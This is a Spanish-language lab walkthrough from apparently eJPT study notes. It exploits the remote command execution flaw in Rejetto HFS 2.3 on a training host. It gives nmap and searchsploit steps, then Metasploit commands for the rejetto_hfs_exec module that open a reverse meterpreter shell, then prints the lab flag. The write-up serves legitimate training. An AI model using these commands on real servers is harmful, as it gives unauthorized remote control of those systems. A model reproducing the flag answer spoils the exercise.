> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-windows/explotando-un-servidor-de-archivos-http-vulnerable.md).

# Explotando un servidor de archivos HTTP vulnerable

### 🧾 ¿Qué es un HTTP File Server?

Un **HTTP File Server (HFS)** es un tipo de servidor web diseñado para el **compartir archivos y documentos** a través de la red. Normalmente utilizan el protocolo HTTP y operan sobre el puerto **TCP 80**.

Uno de los HFS más populares es **Rejetto HFS**, una aplicación gratuita y de código abierto que puede ser instalada tanto en sistemas Windows como Linux.

***

### ⚠️ Vulnerabilidad en Rejetto HFS v2.3

La versión **2.3 de Rejetto HFS** contiene una **vulnerabilidad de ejecución remota de comandos (RCE)**. Esta falla permite que un atacante, sin autenticación previa, pueda ejecutar comandos arbitrarios en el sistema que está ejecutando el servidor vulnerable.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/yRy78sB7xFkOSiJfgrDF" alt=""><figcaption></figcaption></figure>

**Paso 2:** Ejecute un escaneo de Nmap contra el objetivo.

**Dominio:**

```
nmap --top-ports 65536 demo.ine.local
```

<figure><img src="/files/fHJuSqfXXaGzJfhWtDd3" alt=""><figcaption></figcaption></figure>

**Paso 3:** Hemos detectado que varios puertos están abiertos. Ejecutaremos nmap de nuevo para determinar la versión del puerto 80.

**Dominio:**

```
nmap -sV -p 80 demo.ine.local
```

<figure><img src="/files/iqjqXXSSbK8ScohgSfmM" alt=""><figcaption></figcaption></figure>

**Paso 4:** Buscaremos el módulo de explotación del servidor de archivos hfs usando searchsploit.

**Dominio:**

```
searchsploit hfs
```

<figure><img src="/files/I6cCVN2DRSY560MlSdNe" alt=""><figcaption></figcaption></figure>

**Paso 5:** El servidor de archivos HTTP Rejetto (HFS) 2.3 es vulnerable a RCE. Se está explotando el servidor objetivo mediante Metasploit.

**Comandos:**

```
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RPORT 80
set RHOSTS demo.ine.local
set LHOST <Make Sure to Enter Valid LHOST IP Address>
exploit
```

**Nota:** utilice la IP de la máquina Kali atacante para LHOST.

<figure><img src="/files/6X8JNdYsdlyqf9HAXvPm" alt=""><figcaption></figcaption></figure>

Hemos explotado con éxito la aplicación vulnerable de destino (hfs) y recibimos un shell meterpreter.

**Paso 6:** Buscando la bandera.

**Dominio:**

```
shell
cd /
dir
type flag.txt
```

<figure><img src="/files/TXBUCTK7fIINi4fDqv4X" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

Bandera: f74c8347798f4082daf4b4570dba094a

#### Conclusión

En este laboratorio, aprendimos cómo se puede explotar una aplicación de servidor HFS.

Referencias

1. [Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution](https://www.exploit-db.com/exploits/39161)
2. [Metasploit Module](https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec)
